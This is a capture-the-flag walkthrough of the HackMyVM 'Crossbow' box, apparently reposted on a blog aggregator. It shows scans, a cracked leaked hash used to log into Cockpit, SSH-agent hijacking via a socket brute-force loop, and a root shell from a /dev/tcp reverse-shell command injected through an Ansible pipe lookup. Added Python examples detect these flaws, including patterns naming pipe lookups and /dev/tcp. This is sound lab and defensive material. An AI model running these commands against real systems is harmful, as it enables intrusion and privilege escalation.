[HackMyVM] Crossbow box

Kali: 192.168.56.104

Target: 192.168.56.136

Port scan

  # nmap 192.168.56.136
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-26 22:17 CST
  Nmap scan report for crossbow.hmv (192.168.56.136)
  Host is up (0.0057s latency).
  Not shown: 997 closed tcp ports (reset)
  PORT     STATE SERVICE
  22/tcp   open  ssh
  80/tcp   open  http
  9090/tcp open  zeus-admin

Three ports open: 22, 80 and 9090.

Scan port 80 first.

  # gobuster dir -u http://192.168.56.136/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
  ===============================================================
  Gobuster v3.6
  by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  ===============================================================
  [+] Url:                     http://192.168.56.136/
  [+] Method:                  GET
  [+] Threads:                 10
  [+] Wordlist:                /usr/share/wordlists/dirb/common.txt
  [+] Negative Status codes:   404
  [+] User Agent:              gobuster/3.6
  [+] Extensions:              zip,html,txt,php,bak
  [+] Timeout:                 10s
  ===============================================================
  Starting gobuster in directory enumeration mode
  ===============================================================
  /.html                (Status: 403) [Size: 279]
  /.php                 (Status: 403) [Size: 279]
  /.hta.txt             (Status: 403) [Size: 279]
  /.hta.php             (Status: 403) [Size: 279]
  /.hta.bak             (Status: 403) [Size: 279]
  /.htaccess.bak        (Status: 403) [Size: 279]
  /.htaccess.zip        (Status: 403) [Size: 279]
  /.htaccess.html       (Status: 403) [Size: 279]
  /.htaccess            (Status: 403) [Size: 279]
  /.htaccess.php        (Status: 403) [Size: 279]
  /.hta.html            (Status: 403) [Size: 279]
  /.htpasswd.html       (Status: 403) [Size: 279]
  /.htpasswd.txt        (Status: 403) [Size: 279]
  /.htpasswd.zip        (Status: 403) [Size: 279]
  /.hta                 (Status: 403) [Size: 279]
  /.htpasswd.bak        (Status: 403) [Size: 279]
  /.htpasswd            (Status: 403) [Size: 279]
  /.hta.zip             (Status: 403) [Size: 279]
  /.htaccess.txt        (Status: 403) [Size: 279]
  /.htpasswd.php        (Status: 403) [Size: 279]
  /index.html           (Status: 200) [Size: 5205]
  /index.html           (Status: 200) [Size: 5205]
  /server-status        (Status: 403) [Size: 279]
  Progress: 27684 / 27690 (99.98%)
  ===============================================================
  Finished
  ===============================================================

Nothing there. Scan 9090 as well.

  # gobuster dir -u http://192.168.56.136:9090/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
  ===============================================================
  Gobuster v3.6
  by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  ===============================================================
  [+] Url:                     http://192.168.56.136:9090/
  [+] Method:                  GET
  [+] Threads:                 10
  [+] Wordlist:                /usr/share/wordlists/dirb/common.txt
  [+] Negative Status codes:   404
  [+] User Agent:              gobuster/3.6
  [+] Extensions:              html,txt,php,bak,zip
  [+] Timeout:                 10s
  ===============================================================
  Starting gobuster in directory enumeration mode
  ===============================================================
  Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.136:9090/bf206408-5c03-4480-b8c2-0b790b56c627 => 200 (Length: 11740). To continue please exclude the status code or the length

OK, that can't be brute-forced this way: the server answers 200 for every nonexistent path.

Look at the site directly instead.

No interactive features to speak of.

Two JS files turn up in the page source:

  //config.js
  const API_ENDPOINT = "https://phishing.crossbow.hmv/data";
  const HASH_API_KEY = "49ef6b765d39f06ad6a20bc951308393";
  // Metadata for last system upgrade
  const SYSTEM_UPGRADE = {
      version: "2.3.1",
      date: "2023-04-15",
      processedBy: "SnefruTools V1",
      description: "Routine maintenance and security patches"
  }

  //app.js
  document.addEventListener("DOMContentLoaded", function() {
      fetch(API_ENDPOINT, {
          headers: {
              "Authorization": `Bearer ${API_KEY}`
          }
      })
      .then(response => response.json())
      .then(data => {
          if (data && Array.isArray(data.messages)) {
              const randomMessage = data.messages[Math.floor(Math.random() * data.messages.length)];
              const messageElement = document.createElement("blockquote");
              messageElement.textContent = randomMessage;
              messageElement.style.marginTop = "20px";
              messageElement.style.fontStyle = "italic";
              const container = document.querySelector(".container");
              container.appendChild(messageElement);
          }
      });
  });

config.js exposes a hostname (phishing.crossbow.hmv) and a hash-like API key. Note that app.js reads API_KEY while config.js only defines HASH_API_KEY, so the bearer header would never be built as written; the value itself is still shipped to every visitor.

Look at the hostname first.

Add phishing.crossbow.hmv to /etc/hosts:

  192.168.56.136 phishing.crossbow.hmv

Then scan it:
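Hard-coded credentials in static JavaScript are the kind of thing a pre-deploy secret scan catches before the file is served. The following is an added example (not code from the page or from the box's author): a small scanner that reads a JS file, flags `const` string literals whose name or value looks like a credential, reports bearer tokens assembled client-side, and lists template references (such as `${API_KEY}`) that no config file defines. The sample inputs are the two files quoted above, trimmed to their relevant lines; the regexes and function names are this example's own.

```python
import re

# Constructed sample input: the two files quoted on the page, trimmed to the relevant lines.
CONFIG_JS = '''
const API_ENDPOINT = "https://phishing.crossbow.hmv/data";
const HASH_API_KEY = "49ef6b765d39f06ad6a20bc951308393";
const SYSTEM_UPGRADE = { version: "2.3.1", processedBy: "SnefruTools V1" };
'''
APP_JS = '''
fetch(API_ENDPOINT, { headers: { "Authorization": `Bearer ${API_KEY}` } })
'''

# `const NAME = "literal"` with matching quote characters (single, double or backtick)
CONST_RE = re.compile(r'\bconst\s+([A-Za-z_$][\w$]*)\s*=\s*(["\'`])(.*?)\2')
# names that usually denote a credential
SECRET_NAME_RE = re.compile(r'(KEY|TOKEN|SECRET|PASS(?:WORD)?|AUTH)', re.I)
# 128-bit or longer hex strings: hashes, API keys, HMACs
HEX_RE = re.compile(r'^[0-9a-f]{32,}$', re.I)
# identifiers interpolated into template literals
TEMPLATE_REF_RE = re.compile(r'\$\{\s*([A-Za-z_$][\w$]*)\s*\}')


def defined_names(js):
    """Names bound by top-level `const NAME = "..."` statements."""
    return {name for name, _, _ in CONST_RE.findall(js)}


def find_exposed_secrets(js):
    """Return one finding per const string literal that looks like a credential."""
    findings = []
    for name, _, value in CONST_RE.findall(js):
        reasons = []
        if SECRET_NAME_RE.search(name):
            reasons.append("secret-like name")
        if HEX_RE.match(value):
            reasons.append(f"{len(value) * 4}-bit hex literal")
        if reasons:
            findings.append({"name": name, "value": value, "reasons": reasons})
    return findings


def find_client_side_bearer_tokens(js):
    """Identifiers used to build an Authorization: Bearer header in the browser."""
    return re.findall(r'[\'"]Authorization[\'"]\s*:\s*`Bearer \$\{(\w+)\}`', js)


def undefined_template_refs(app_js, config_js):
    """Template references in app_js that config_js never defines (ReferenceError at runtime)."""
    return sorted(set(TEMPLATE_REF_RE.findall(app_js)) - defined_names(config_js))


if __name__ == "__main__":
    for f in find_exposed_secrets(CONFIG_JS):
        print(f"{f['name']}: {', '.join(f['reasons'])}")
    print("bearer built from:", find_client_side_bearer_tokens(APP_JS))
    print("undefined refs:", undefined_template_refs(APP_JS, CONFIG_JS))
```

Run it over a site's served JS as part of CI; any finding means the value should move server-side and be issued per session rather than embedded in a file every visitor downloads.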

  # gobuster dir -u http://phishing.crossbow.hmv/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
  ===============================================================
  Gobuster v3.6
  by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  ===============================================================
  [+] Url:                     http://phishing.crossbow.hmv/
  [+] Method:                  GET
  [+] Threads:                 10
  [+] Wordlist:                /usr/share/wordlists/dirb/common.txt
  [+] Negative Status codes:   404
  [+] User Agent:              gobuster/3.6
  [+] Extensions:              html,txt,php,bak,zip
  [+] Timeout:                 10s
  ===============================================================
  Starting gobuster in directory enumeration mode
  ===============================================================
  /.html                (Status: 403) [Size: 286]
  /.hta.html            (Status: 403) [Size: 286]
  /.hta.txt             (Status: 403) [Size: 286]
  /.hta.php             (Status: 403) [Size: 286]
  /.hta.bak             (Status: 403) [Size: 286]
  /.htaccess            (Status: 403) [Size: 286]
  /.htaccess.txt        (Status: 403) [Size: 286]
  /.htaccess.bak        (Status: 403) [Size: 286]
  /.htaccess.zip        (Status: 403) [Size: 286]
  /.htpasswd            (Status: 403) [Size: 286]
  /.htpasswd.txt        (Status: 403) [Size: 286]
  /.php                 (Status: 403) [Size: 286]
  /.htaccess.php        (Status: 403) [Size: 286]
  /.htpasswd.bak        (Status: 403) [Size: 286]
  /.htaccess.html       (Status: 403) [Size: 286]
  /.htpasswd.html       (Status: 403) [Size: 286]
  /.htpasswd.zip        (Status: 403) [Size: 286]
  /.hta                 (Status: 403) [Size: 286]
  /.hta.zip             (Status: 403) [Size: 286]
  /.htpasswd.php        (Status: 403) [Size: 286]
  /index.html           (Status: 200) [Size: 1202]
  /index.html           (Status: 200) [Size: 1202]
  /server-status        (Status: 403) [Size: 286]
  Progress: 27684 / 27690 (99.98%)
  ===============================================================
  Finished
  ===============================================================

Nothing.

Look at the page itself.

Blank as a sheet of paper.

Now port 9090.

It's a login page.

Check it with whatweb:

  # whatweb http://192.168.56.136:9090
  http://192.168.56.136:9090 [200 OK] Cookies[cockpit], Country[RESERVED][ZZ], HTML5, HttpOnly[cockpit], IP[192.168.56.136], PasswordField, Script[text/javascript], Title[Loading...], UncommonHeaders[content-security-policy,x-dns-prefetch-control,referrer-policy,x-content-type-options,cross-origin-resource-policy], X-Frame-Options[sameorigin]

No useful information there either (the cockpit cookie says it is Cockpit). The only lead left is the hash value:

  const API_ENDPOINT = "https://phishing.crossbow.hmv/data";
  const HASH_API_KEY = "49ef6b765d39f06ad6a20bc951308393";
  // Metadata for last system upgrade
  const SYSTEM_UPGRADE = {
      version: "2.3.1",
      date: "2023-04-15",
      processedBy: "SnefruTools V1",
      description: "Routine maintenance and security patches"
  }

There is a processedBy of SnefruTools V1; search for it.

Snefru turns out to be a cryptographic hash function, so the "hash" is a Snefru digest.

Searching for "Snefru decrypt" leads to a lookup site:

snefru256 hash decoder and calculator (md5hashing.net)

Paste the hash into the lookup box on the right.

The lookup result is ELzkRudzaNXRyNuN6

The box's author goes by Polo, so guess the username is Polo. Log in on port 9090; testing shows the username is polo.

From the Cockpit terminal, throw a reverse shell back to Kali.

The polo user has no user flag and no sudo -l rights. Damn.

pspy64 turns up nothing either.

Running linpeas shows I'm inside Docker:

  ╔══════════╣ Executing Linux Exploit Suggester 2
  ╚ https://github.com/jondonas/linux-exploit-suggester-2
  ╔══════════╣ Protections
  ═╣ AppArmor enabled? .............. /etc/apparmor.d
  ═╣ grsecurity present? ............ grsecurity Not Found
  ═╣ PaX bins present? .............. PaX Not Found
  ═╣ Execshield enabled? ............ Execshield Not Found
  ═╣ SELinux enabled? ............... sestatus Not Found
  ═╣ Seccomp enabled? ............... enabled
  ═╣ AppArmor profile? .............. docker-default (enforce)
  ═╣ User namespace? ................ enabled
  ═╣ Cgroup2 enabled? ............... enabled
  ═╣ Is ASLR enabled? ............... Yes
  ═╣ Printer? ....................... No
  ═╣ Is this a virtual machine? ..... Yes (docker)

Check the process list:

  polo@crossbow:~$ ps aux
  USER         PID %CPU %MEM    VSZ   RSS TTY   STAT START  TIME COMMAND
  root           1  1.9  1.5  36932 31144 ?     Ss   13:49  1:14 /usr/bin/pyth
  root           7  0.0  0.0   2576   932 ?     S    13:49  0:00 /bin/sh /usr/
  root           9  0.0  0.4 235352  8156 ?     Sl   13:49  0:00 /usr/lib/cock
  root          14  0.0  1.2 201120 24572 ?     S    13:49  0:00 /usr/sbin/apa
  lea           16  8.0  0.1   4564  3408 ?     S    13:49  5:16 /bin/bash /ho
  root          22  0.0  0.1   3976  2064 ?     Ss   13:49  0:00 /usr/sbin/cro
  root          31  0.0  0.1  15404  3320 ?     Ss   13:49  0:00 sshd: /usr/sb
  lea         1082  0.0  0.1   7792  3040 ?     Ss   13:50  0:00 ssh-agent
  www-data  125718  0.0  0.6 201856 12836 ?     S    14:05  0:01 /usr/sbin/apa
  www-data  125722  0.0  0.6 201732 12604 ?     S    14:05  0:01 /usr/sbin/apa
  www-data  125723  0.0  0.6 201704 12584 ?     S    14:05  0:02 /usr/sbin/apa
  www-data  288598  0.0  0.6 201704 12516 ?     S    14:18  0:01 /usr/sbin/apa
  www-data  288614  0.0  0.6 201848 12820 ?     S    14:18  0:01 /usr/sbin/apa
  www-data  288616  0.0  0.6 201856 12816 ?     S    14:18  0:01 /usr/sbin/apa
  www-data  360679  0.0  0.6 201704 12516 ?     S    14:24  0:00 /usr/sbin/apa
  www-data  360696  0.0  0.6 201704 12516 ?     S    14:25  0:00 /usr/sbin/apa
  www-data  360697  0.0  0.6 201704 12496 ?     S    14:25  0:00 /usr/sbin/apa
  www-data  360717  0.0  0.6 201704 12520 ?     S    14:25  0:00 /usr/sbin/apa
  root      517596  0.0  0.2  11660  5400 ?     S    14:38  0:00 /usr/lib/cock
  polo      517616  0.0  0.0   7660   772 ?     Ss   14:38  0:00 /usr/bin/ssh-
  polo      517627  0.0  0.5 309656 11236 ?     Sl   14:38  0:00 cockpit-bridg
  polo      517629  0.0  0.2   8988  4136 ?     S    14:38  0:00 dbus-daemon -
  root      523850  0.0  0.2   7296  4464 ?     S    14:38  0:00 sudo -k -A co
  polo      523854  0.0  0.1   8860  2092 ?     S    14:38  0:00 /usr/lib/cock
  polo      527219  0.0  0.1   4608  3644 pts/0 Ss   14:39  0:00 /bin/bash
  polo      588905 14.2  1.2 106140 25248 ?     Sl   14:45  1:25 ./pspy64
  polo      604208 15.1  1.0 106140 21412 ?     Sl   14:47  1:12 ./pspy64
  polo      606536  0.0  0.1   4344  2968 pts/0 S    14:47  0:00 bash -c bash
  polo      606538  0.0  0.1   4608  3716 pts/0 S    14:47  0:00 bash -i
  polo      607089  0.1  0.0   2936  1000 pts/0 S+   14:47  0:00 /usr/bin/scri
  polo      607090  0.0  0.1   4608  3560 pts/3 Ss   14:47  0:00 /bin/bash
  polo      629543  0.0  0.0  78696   820 ?     Ss   14:51  0:00 gpg-agent --h
  polo      657840 33.3  0.2   8536  4156 pts/3 R+   14:55  0:00 ps aux

The user lea has an ssh-agent running (PID 1082).

A forwarded or running SSH agent can be hijacked to authenticate to other systems as that user. Here is a write-up on the technique:

SSH Forward Agent exploitation | HackTricks | HackTricks
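From the defender's side, the thing to catch is exactly what this step relies on: a process running as one user whose SSH_AUTH_SOCK points at an agent socket owned by another user. The following is an added example (not from the page or the HackTricks article): a Python checker that parses /proc/<pid>/environ records, compares each process's uid with the owner of the socket it references, and reports mismatches. The `ProcInfo` type, the function names, the uids and the pid 700000 in the sample are this example's own; the socket directory name and the other pids come from the listings on the page. The live collector needs root to read other users' environ.

```python
import os
import stat
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcInfo:
    pid: int
    uid: int                      # uid owning the process
    ssh_auth_sock: Optional[str]  # value of SSH_AUTH_SOCK in its environment, if any


def parse_environ(raw: bytes) -> dict:
    """Parse the NUL-separated KEY=VALUE records of /proc/<pid>/environ."""
    env = {}
    for item in raw.split(b"\0"):
        if b"=" in item:
            key, value = item.split(b"=", 1)
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def find_cross_user_agent_use(procs, socket_owner):
    """Return (pid, proc_uid, socket_uid, path) for each process whose
    SSH_AUTH_SOCK names a socket owned by a different uid.

    socket_owner(path) returns the owner uid, or None when the path is not a
    live socket (for example a guessed agent.<pid> that never existed)."""
    hits = []
    for p in procs:
        if not p.ssh_auth_sock:
            continue
        owner = socket_owner(p.ssh_auth_sock)
        if owner is not None and owner != p.uid:
            hits.append((p.pid, p.uid, owner, p.ssh_auth_sock))
    return hits


def socket_owner_from_fs(path):
    """Live lookup: owner uid of an existing UNIX socket, else None."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid if stat.S_ISSOCK(st.st_mode) else None


def collect_procs():
    """Live collector over /proc on Linux (root needed for other users' environ)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/environ", "rb") as fh:
                env = parse_environ(fh.read())
            uid = os.stat(f"/proc/{entry}").st_uid
        except OSError:
            continue  # process exited or environ not readable
        procs.append(ProcInfo(int(entry), uid, env.get("SSH_AUTH_SOCK")))
    return procs


# Constructed sample: uid 1001 stands for lea, uid 1000 for polo (both invented);
# pid 700000 is invented, the other pids and the socket directory are from the page.
SAMPLE_PROCS = [
    ProcInfo(1082, 1001, "/tmp/ssh-XXXXXXZsiuGq/agent.1081"),    # lea's own agent client
    ProcInfo(606538, 1000, "/tmp/ssh-XXXXXXZsiuGq/agent.1081"),  # polo's shell pointed at lea's socket
    ProcInfo(527219, 1000, None),                                 # shell with no agent at all
    ProcInfo(700000, 1000, "/tmp/ssh-XXXXXXZsiuGq/agent.1085"),  # guess at a pid that never existed
]
SAMPLE_OWNERS = {"/tmp/ssh-XXXXXXZsiuGq/agent.1081": 1001}


if __name__ == "__main__":
    for hit in find_cross_user_agent_use(SAMPLE_PROCS, SAMPLE_OWNERS.get):
        print("pid %d (uid %d) uses an agent socket owned by uid %d: %s" % hit)
    # On a real host: find_cross_user_agent_use(collect_procs(), socket_owner_from_fs)
```

Run from cron or an EDR hook, a single hit is high-signal: no legitimate workflow points one user's SSH client at another user's agent. The preventive controls are the usual ones: leave ForwardAgent off for hosts you do not fully trust, and load keys with `ssh-add -c` so every use of the key requires an interactive confirmation.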

Check /tmp:

  polo@crossbow:/tmp$ ls -al
  total 3024
  drwxrwxrwt 4 root root    4096 Mar 26 14:50 .
  drwxr-xr-x 1 root root    4096 Dec 14 18:17 ..
  srwxrwxrwx 1 polo polo       0 Mar 26 14:38 dbus-TD9eVzQl3e
  -rwxr-xr-x 1 polo polo 3078592 Mar  1 13:49 pspy64
  drwx------ 2 polo polo    4096 Mar 26 14:38 ssh-XXXXXXRpQnqX
  drwx------ 2 lea  lea     4096 Mar 26 13:50 ssh-XXXXXXZsi

lea's agent directory is there: ssh-XXXXXXZsiuGq

The socket name ends in the agent's pid, which is unknown, so brute-force it:

  for i in {1080..1090}; do SSH_AUTH_SOCK=ssh-XXXXXXZsiuGq/agent.$i ssh lea@192.168.56.136; done

That fails. Looking at /etc/passwd shows one more user, pedro:

  root:x:0:0:root:/root:/usr/bin/zsh
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
  _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
  systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
  messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
  avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
  sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
  mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
  pedro:x:1002:1002:,,,:/home/pedro:/bin/zsh

Brute-force again with that username:

  for i in {1080..1090}; do SSH_AUTH_SOCK=ssh-XXXXXXZsiuGq/agent.$i ssh pedro@192.168.56.136; done
  The authenticity of host '192.168.56.136 (192.168.56.136)' can't be established.
  ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
  This host key is known by the following other names/addresses:
      ~/.ssh/known_hosts:1: [hashed name]
      ~/.ssh/known_hosts:4: [hashed name]
      ~/.ssh/known_hosts:5: [hashed name]
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  Warning: Permanently added '192.168.56.136' (ED25519) to the list of known hosts.
  pedro@192.168.56.136's password:
  Permission denied, please try again.
  pedro@192.168.56.136's password:
  Permission denied, please try again.
  pedro@192.168.56.136's password:
  pedro@192.168.56.136: Permission denied (publickey,password).
  Last login: Fri Dec 15 18:56:12 2023 from 172.17.0.2
  ╭─pedro@crossbow ~
  ╰─$

No password is needed: keep pressing Enter through the failed attempts, and once the loop reaches the right agent socket the public-key login succeeds and you get pedro's shell.

That also yields the user flag. No wonder polo and lea had none; there was one more user.

  ╭─pedro@crossbow ~
  ╰─$ ls -al
  total 220
  drwx------  6 pedro pedro   4096 Mar 26 16:07 .
  drwxr-xr-x  3 root  root    4096 Sep  5  2023 ..
  -rw-r--r--  1 pedro pedro    220 Aug 30  2023 .bash_logout
  -rw-r--r--  1 pedro pedro   3526 Aug 30  2023 .bashrc
  drwx------  3 pedro pedro   4096 Sep 16  2023 .gnupg
  drwxr-xr-x  3 pedro pedro   4096 Sep 15  2023 .local
  drwxr-xr-x 12 pedro pedro   4096 Dec 14 18:55 .oh-my-zsh
  -rw-r--r--  1 pedro pedro    807 Aug 30  2023 .profile
  drwx------  2 pedro pedro   4096 Dec 14 18:49 .ssh
  -rw-r--r--  1 pedro pedro  51851 Dec 15 18:56 .zcompdump-crossbow-5.9
  -r--r--r--  1 pedro pedro 120032 Dec 15 18:56 .zcompdump-crossbow-5.9.zwc
  -rw-------  1 pedro pedro     53 Mar 26 16:07 .zsh_history
  -rw-r--r--  1 pedro pedro   3890 Aug 30  2023 .zshrc
  -rwx------  1 pedro pedro     33 Sep  5  2023 user.txt

Now to escalate privileges.

Check the listening ports:

  ╭─pedro@crossbow ~
  ╰─$ ss -tulnp
  Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
  udp   UNCONN 0      0            0.0.0.0:68         0.0.0.0:*
  tcp   LISTEN 0      4096         0.0.0.0:9090       0.0.0.0:*
  tcp   LISTEN 0      80         127.0.0.1:3306       0.0.0.0:*
  tcp   LISTEN 0      4096       127.0.0.1:3000       0.0.0.0:*
  tcp   LISTEN 0      4096         0.0.0.0:80         0.0.0.0:*
  tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
  tcp   LISTEN 0      4096            [::]:9090          [::]:*
  tcp   LISTEN 0      4096            [::]:80            [::]:*
  tcp   LISTEN 0      128             [::]:22            [::]:*

Port 3000 is bound to localhost only.

Port forwarding with ssh and with nc dropped right away, not sure why.

Use socat instead:

  ╭─pedro@crossbow ~
  ╰─$ socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:3000 &
  [1] 800897

Opening it in the browser shows a login page.

The weak credentials admin/admin log in.

Edit the Environment entry.

Use the lookup built-in in the playbook's JSON extra vars to spawn a reverse shell, and add the environment settings:

  {
      "ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/192.168.56.104/4567 <&1'\") }}"
  }

  {
      "LC_ALL": "en_US.UTF-8",
      "LANG": "en_US.UTF-8"
  }

Then run the task from the task template.

With a listener on Kali, the callback comes in as root:

  # nc -lvnp 4567
  listening on [any] 4567 ...
  connect to [192.168.56.104] from (UNKNOWN) [192.168.56.136] 44338
  bash: impossible de régler le groupe de processus du terminal (645): Ioctl() inapproprié pour un périphérique
  bash: pas de contrôle de tâche dans ce shell
  root@crossbow:/root# cat /root/r*
  cat /root/r*
  7a299c41b1daac46d5ab98745b212e09
  root@crossbow:/root#
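The root step works because the automation front end hands user-supplied variable values to Ansible, where Jinja2 evaluates them and `lookup('pipe', ...)` runs a command with the worker's privileges. The defensive counterpart is to refuse or neutralise template syntax in variables that arrive from a UI or API. The following is an added example (not code from the page, from Ansible, or from the automation product on port 3000): a validator that walks a JSON extra-vars document, flags any string containing Jinja delimiters, and raises the severity when the expression uses a lookup plugin that reads files or runs commands, or contains a `/dev/tcp/` shell redirection. The sample inputs are constructed; the second one is the harmless environment JSON from the page.

```python
import json
import re

# Jinja2 delimiters: expression, statement, comment
TEMPLATE_RE = re.compile(r"\{\{|\{%|\{#")
# lookup plugins that execute commands or read the controller's filesystem
EXEC_LOOKUP_RE = re.compile(
    r"lookup\s*\(\s*['\"](?:ansible\.builtin\.)?(pipe|shell|cmd|env|file|url)['\"]", re.I)
# bash network redirection used for reverse connections
DEV_TCP_RE = re.compile(r"/dev/(tcp|udp)/")


def scan_vars(obj, path="$"):
    """Recursively collect findings for every string value containing template syntax."""
    findings = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            findings += scan_vars(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            findings += scan_vars(value, f"{path}[{i}]")
    elif isinstance(obj, str) and TEMPLATE_RE.search(obj):
        severity = "medium"  # any template in user input is suspicious
        if EXEC_LOOKUP_RE.search(obj) or DEV_TCP_RE.search(obj):
            severity = "critical"  # command execution or exfil channel
        findings.append({"path": path, "severity": severity, "value": obj})
    return findings


def validate_extra_vars(raw_json):
    """Gate for a submission endpoint: parse, scan, and decide."""
    try:
        doc = json.loads(raw_json)
    except json.JSONDecodeError as exc:
        return {"allowed": False, "findings": [{"path": "$", "severity": "error",
                                                "value": f"invalid JSON: {exc.msg}"}]}
    findings = scan_vars(doc)
    return {"allowed": not findings, "findings": findings}


# Constructed samples: a templated value that runs a command, and the benign
# environment block shown on the page.
SAMPLE_EXEC = '{"ansible_user": "{{ lookup(\'ansible.builtin.pipe\', \'id\') }}"}'
SAMPLE_ENV = '{"LC_ALL": "en_US.UTF-8", "LANG": "en_US.UTF-8"}'


if __name__ == "__main__":
    for raw in (SAMPLE_EXEC, SAMPLE_ENV):
        result = validate_extra_vars(raw)
        print(result["allowed"], [(f["path"], f["severity"]) for f in result["findings"]])
```

Where templating in user-provided values is genuinely needed, the safer pattern is to store them as unsafe text so Jinja never evaluates them (the `!unsafe` tag in YAML inventories and vars files does this), and to run job workers as an unprivileged account rather than root so that a successful injection does not hand over the host.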

Notice: this article was contributed by a user and does not represent the position of the wpsshop blog; copyright belongs to the original author. Source: https://www.wpsshop.cn/w/正经夜光杯/article/detail/993941